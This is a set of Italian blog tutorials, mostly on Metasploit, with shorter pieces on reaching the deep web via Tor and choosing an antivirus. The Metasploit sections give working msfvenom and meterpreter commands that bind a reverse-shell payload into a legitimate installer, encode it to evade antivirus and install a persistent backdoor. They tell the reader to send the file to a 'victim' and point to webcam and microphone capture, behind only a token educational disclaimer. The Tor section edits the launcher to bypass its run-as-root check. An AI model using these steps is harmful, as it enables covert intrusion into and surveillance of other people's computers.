Metasploit: Come creare un Trojan Horse

Metasploit: Come creare un Trojan Horse

Abbiamo già visto come creare un “virus” con Metasploit. Abbiamo però generato un file .exe generico, che in uno scenario reale, la vittima non cliccherà mai, oltre al fatto che, ciò che abbiamo creato, è altamente rilevabile da un antivirus. Vedremo adesso come generare un Trojan Horse in modo da illudere la vittima che sia un ordinario file di windows, ed evitare di essere beccati dall’antivirus.

Procuriamoci un eseguibile che la vittima potrebbe cliccare senza farsi dubbi, in questo caso utilizzerò CCleaner.exe.

Avviamo il nostro terminale e dirigiamoci nella directory in cui risiede il file da utilizzare (da adesso lo chiameremo template).

Nel mio caso in Scrivania.

Digitiamo ora:

msfvenom -p windows/meterpreter/reverse_tcp lport=[porta desiderata] lhost=[il vostro ip] -e x86/shikata_ga_nai -i 5 -b '\x00' -x [template.exe] -k -f exe -o [nomefile].exe

Rispetto alla scorsa volta abbiamo inserito qualcosina in più:

  • -e (l’encoder da utilizzare per poter codificare il nostro payload, eviterà che gli antivirus rilevino la minaccia)
  • -i (l’iterazione ovvero quante volte il processo di codifica deve ripetersi)
  • -b ‘\x00’ (evitiamo che durante la codifica si generino nullbyte ossia caratteri nulli che potrebbero generare errori durante l’esecuzione)
  • -x (per indicare quale file utilizzare come template)
  • -k (keep, serve a mantenere la funzione del template e avviare il nostro payload in un nuovo thread)

A questo punto dobbiamo solo metterci in ascolto da msfconsole. Se non sai come fare leggi questo

E renderlo persistente: Leggi qui

NOTA: Se si utilizza un template a 64 bit potresti ricevere un un errore simile:

  • Se si tenta di impostare l’architettura -a x64 con un payload per 32 bit (x86)
Error: The selected arch is incompatible with the payload

La soluzione è passare ad un payload a 64 bit, ad esempio per un tcp inverso:

-p windows/x64/meterpreter/reverse_tcp
  • Un’altro errore viene prodotto dall’utilizzo di un encoder a 32bit per un template a 64bit:
Error: immediate overflow ... ... ... "\"unk\"" line 4

La soluzione è cambiare l’encoder in uno a 64bit, per esempio:

x64/xor

Leggi anche come difenderti da minacce come queste QUI

 

ATTENZIONE: QUESTA GUIDA È STATA SCRITTA SOLO A SCOPO DIDATTICO NON MI ASSUMO NESSUNA RESPONSABILITÀ DELLE VOSTRE AZIONI ILLEGALI O DANNI CAUSATI. RICORDO CHE LA VIOLAZIONE DELLA PRIVACY E DANNI CAUSATI TRAMITE MEZZI INFORMATICI, SONO PUNITI PENALMENTE!
Metasploit: Creare una backdoor persistente

Metasploit: Creare una backdoor persistente

Abbiamo gia visto come compromettere il sistema con meterpreter a connessione TCP inversa leggi qui!

Ma il problema più grande è che ad ogni riavvio dovremmo attendere che la nostra vittima avvii nuovamente il nostro file, cosa che accade davvero raramente. Come ovviare a questo problema?

Andiamo a creare la vera e propria backdoor, è utile sapere che metasploit ha 2 opzioni per la nostra backdoor persistente:

  1. Persistence
  2. Metsvc

Il problema della backdoor metsvc è che è molto semplice da rilevare eseguendo un qualsiasi port scanner, anche se di pro ha il fatto che sia meno “rumorosa” della persistence.

Per ragioni ovvie utilizzeremo in questa guida la backdoor persistence.

Avviata la sessione meterpreter digitiamo il comando:

run persistence -h

Ci darà come output le opzioni da utilizzare:

Andiamo a vedere cosa utilizzare per la nostra backdoor:

  • -X (se vogliamo che la nostra vittima stabilisca un collegamento con noi all’avvio)
  • -A (avvierà automaticamente il multi/handler)
  • -L (La destinazione in cui installeremo la nostra backdoor, come espressamente detto dalle opzioni in caso di omissione sceglierà automaticamente la cartella temp)
  • -U (in alternativa a -X)
  • -i (L’intervallo di tempo per ogni tentativo di connessione)
  • -p (porta scelta)
  • -r (il nostro ip)

Dunque eseguiamo il comando:

run persistence -A -U -i 10 -p [porta scelta] -r [vostro ip]

Da adesso la macchina attaccata rimarrà costantemente in ascolto con l’attaccante.

Per avere conferma di quanto detto eseguiamo il comando:

reboot

Attendiamo qualche secondo, si aprirà una nuova sessione con la macchina attaccata!

Nota: Ho utilizzato il comando -L E:\\ per far installare la backdoor sulla mia pennetta (in caso di attacco può essere omesso se ovviamente non avete preferenze particolari)

Una volta sfruttata la vittima se vogliamo eliminare i file creati basta eseguire il comando:

resource [seguito dall'output dato durante la creazione, (dopo la voce resource file for cleanup) /root/.../.../.../file.rc]
ATTENZIONE: QUESTA GUIDA È STATA SCRITTA SOLO A SCOPO DIDATTICO NON MI ASSUMO NESSUNA RESPONSABILITÀ DELLE VOSTRE AZIONI ILLEGALI O DANNI CAUSATI. RICORDO CHE LA VIOLAZIONE DELLA PRIVACY E DANNI CAUSATI TRAMITE MEZZI INFORMATICI, SONO PUNITI PENALMENTE!
Metasploit: Come hackerare windows

Metasploit: Come hackerare windows

Quanto scritto funziona solo in rete locale, ergo, potrete attaccare un pc connesso alla vostra stessa rete.

Abbiamo già parlato di Metasploit e abbiamo visto come configurarlo al primo avvio, clicca qui.

Quello che andremo a creare è un BackDoor ossia un software capace di farci prendere il pieno controllo della macchina attaccata, in questo caso, faremo un attacco ad un sistema Windows.

Apriamo il terminale come utente root dunque digitiamo:

su

Inseriamo la nostra password o di default toor

Adesso ci servono alcune informazioni per poter creare il nostro payload

  • Il nostro ip interno alla rete locale [LHOST]

Per conoscere il nostro ip basta digitare in terminale il seguente comando:

ifconfig

Riceveremo in output le schede Ethernet (eth0) e Wireless (wlan0).

Prendiamo nota dell’ip sotto la voce inet (192.xxx.xxx.xxx) della scheda che stiamo utilizzando.

Nel mio caso sto utilizzando la scheda wlan0 e l’ip interno alla rete locale è 192.168.1.2

Spostiamoci nella directory in cui vogliamo salvare il file generato, nel mio caso lo voglio in scrivania (desktop):

cd /home/manu/Scrivania

Digitiamo il comando:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=[il tuo ip] LPORT=[una porta a piacere] -f exe > [un nome a piacere].exe

Abbiamo -p (payload) nel nostro caso meterpreter consente di iniettare DLL nella macchina della vittima e lavora solo su RAM senza lasciare file sul disco, -f (formato del file che vogliamo generare).

Non abbiamo incluso nel comando l’architettura del sistema (-a), verrà generato automaticamente con l’architettura a 32 bit = x86, e la piattaforma (–platform) nel caso abbiate una preferenza specifica basta inserire prima di LHOST il comando:

...reverse_tcp -a x64 --platform windows LHOST=...

 Comparirà sulla nostra Scrivania il file appena creato.

Ora basta solo inviarlo alla vittima e assicurarci che lo esegua!

Nel frattempo avviamo la nostra console per metterci in ascolto con il nostro payload avviando l’exploit!

Dunque digitiamo in terminale:

systemctl start postgresql

msfconsole

db_status

Digitiamo:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost [IP utilizzato nella creazione del payload]

set lport [Porta utilizzata nella creazione del payload]

run

A questo punto dobbiamo solo aspettare che la nostra vittima esegua il file inviato!

Partito meterpreter possiamo digitare help per avere la lista di tutti i comandi da eseguire, ad esempio scattare foto dalla webcam o avviare la registrazione del microfono, catturare il desktop, avviare la navigazione delle directory e molto altro!

Manca una cosa però, se l’utente riavvia il pc dovremmo aspettare che nuovamente avvii il nostro virus.

Come difenderti da cose simili?? LEGGI QUI

Attenzione: Questa guida è stata scritta solo a scopo didattico non mi assumo nessuna responsabilità per le vostre azioni illegali o danni causati. ricordo che la violazione della privacy e danni causati tramite mezzi informatici, sono puniti penalmente!

 

Metasploit: cos’è e come funziona

Metasploit: cos’è e come funziona

Metasploit? cos’è?

Metasploit è un potente framework multipiattaforma, disponibile anche per windows. Permette lo sviluppo di exploit volti a prendere il controllo totale della macchina remota e non solo. E’ uno strumento creato al fine di testare la sicurezza di un sistema (Penetration Testing), offre strumenti di anti-rilevamento ed elusione.

Come funziona

La guida è rivola a chi sta utilizzando metasploit su kali linux.

Per prima cosa andiamo a creare un database SQL.

Digitiamo in terminale quanto segue:

su

Inseriamo la password dell’utente root scelta durante l’installazione (default toor)

Digitiamo:

systemctl start postgresql

msfconsole

db_status

Se tutto è andato bene riceveremo questa risposta:

[*] postgresql connected to msf

Usciamo con il comando:

exit

Avviamo  msfvenom (è il piano di lavoro, qui creiamo i nostri payload)

msfvenom

Riceveremo questa schermata:

Opzioni:
    -p, --payload Payload da usare. Specificare un '-' o stdin per utilizzare i payload personalizzati
        --payload-options Elenca le opzioni standard del payload
    -l, --list [tipo] Elenca un tipo di modulo. Le opzioni sono: payload, encoder, nops, tutti
    -n, --nopsled Prepara una dimensione di dimensione [lunghezza] sul payload
    -f, --format Formato di output (usa --help-formats per una lista)
        --help-formats Elenca i formati disponibili
    -e, --encoder L'encoder da utilizzare
    -a, --arch L'architettura da usare
        --platform La piattaforma del payload
        --help-platform Elenca le piattaforme disponibili
    -s, --space La dimensione massima del payload risultante
        --encoder-space La dimensione massima del payload codificato (predefinito per il valore -s)
    -b, --bad-chars L'elenco di caratteri da evitare ad esempio: '\ x00 \ xff'
    -i, --iterations Il numero di volte per la codifica del carico utile
    -c, --add-code Specifica un ulteriore file shellcode win32 da includere
    -x, --template Specifica un file eseguibile personalizzato da utilizzare come modello
    -k, --keep Mantiene il comportamento del template e inietta il payload come nuovo thread
    -o, --out Salva il carico utile
    -v, --var-name Specifica un nome di variabile personalizzato da utilizzare per determinati formati di output
        --smallest Genera il minimo carico utile possibile

Digitando il seguente comando verrà ritornata in output la lista dei payload che potrebbero essere creati attraverso msfvenom.

msfvenom -l -p

Risponderà con più di 500 possibili scelte:

Framework Payloads (503 total)
==============================

La lista delle piattaforme è praticamente completa:

  • Cisco
  • OSX
  • Solaris
  • BSD
  • OpenBSD
  • hardware
  • Firefox
  • BSDi
  • NetBSD
  • NodeJS
  • FreeBSD
  • Python
  • AIX
  • JavaScript
  • HPUX
  • PHP
  • Irix
  • Unix
  • Linux
  • Ruby
  • Java
  • Android
  • Netware
  • Windows
  • mainframe
  • multi
Come accedere al Deep Web

Come accedere al Deep Web

Non sai cos’è il Deep Web? Leggi questo articolo

Attenzione: Molti siti presenti in deep web sono illegali ma esplorabili, ogni vostra azione illegale è punita severamente dalla legge, non mi assumo nessuna RESPONSABILITÀ per le vostre azioni, questo articolo è stato scritto a scopo informativo. Potete trovare la lista completa dei siti dark net cliccando qui
Windows:
  1. Scarica TOR browser versione stabile QUI
  2. Avvia il launcher.
  3. Naviga!
Kali Linux debian ubuntu:
  1. Scarica TOR browser versione stabile QUI
  2. Scarichiamo e scompattiamo il file tor-browser-linux…tar.xz
  3. In fine avviamo il file: start-tor-browser.desktop

Con utente root potresti ricevere questo errore: The Tor Browser Bundle should not be run as root”

Ecco come risolvere:

Segui la directory di tor browser (ossia la cartella che abbiamo scompattato precedentemente

Apri e modifica: start-tor-browser  situata in tuadirectory/tor-browser_it\Browser\start-tor-browser” e cerca la seguente parte di codice:

if [ "`id -u`" -eq 0 ]; then
    complain "The Tor Browser Bundle should not be run as root.  Exiting."
    exit 1
fi

Modifica il valore 0 evidenziato portandolo a 1:

if [ "`id -u`" -eq 1 ]; then
    complain "The Tor Browser Bundle should not be run as root.  Exiting."
    exit 1
fi
Android
  1. Scarica Orfox da QUI (Questo è il browser TOR)
  2. Scarica Orbot da QUI (Questa è una proxy app)
  3. Se utilizzate in combinazione è assolutamente meglio.
  4. Aprite Orbot e avviate la navigazione sotto proxy TOR (da adesso con qualsiasi browser sarete anonimi)
  5. Avviare Orfox in combinazione con Orbot garantisce un maggiore anonimato
Come scegliere un buon antivirus

Come scegliere un buon antivirus

La cosa migliore da fare è consultare le classifiche degli antivirus. Forse non lo sai ma alcune società si occupano di valutare ogni antivirus e di stilare una classifica con quelli che hanno ottenuto un buon risultato nell’individuazione di ogni tipologia di virus.

Confrontare queste classifiche è abbastanza proficuo.

Lista classifiche: 
Consigli Personali

Mantenere aggiornato sia i software che il sistema operativo! Buona parte dei malware sfrutta le falle di sicurezza per poter accedere ai vostri dati. Gli aggiornamenti consentono di colmare questi buchi nella sicurezza garantendo così una prevenzione maggiore.

Evitare siti particolari senza misure di sicurezza! I siti web a cui dobbiamo fare particolare attenzione, sono siti porno, torrent, film e serie in streaming illegali, siti che distribuiscono Crack o KeyGen.

Fare particolare attenzione alle estensioni del tuo browser! Spesso capita di scaricare software che avviino in background l’installazione di AdWare, quest’ultimi, spesso legali (l’installazione viene accettata da utenti sbadati o frettolosi), raccolgono informazioni sulla navigazione e pubblicano banner pubblicitari, anche sgradevoli, su qualsiasi pagina.

Su Android evitate le applicazioni distribuite da fonti sconosciute, o se proprio non potete farne a meno, fare particolare attenzione alla panoramica dei permessi e accessi dell’applicazione:

 

 

Come si può notare questa App ha accesso a tutto praticamente.

 

 

 

 

 

Evitare le connessioni pubbliche! E’ possibile recuperare informazioni importanti, come email, password o codici carta di credito, e molto altro attraverso alcuni attacchi.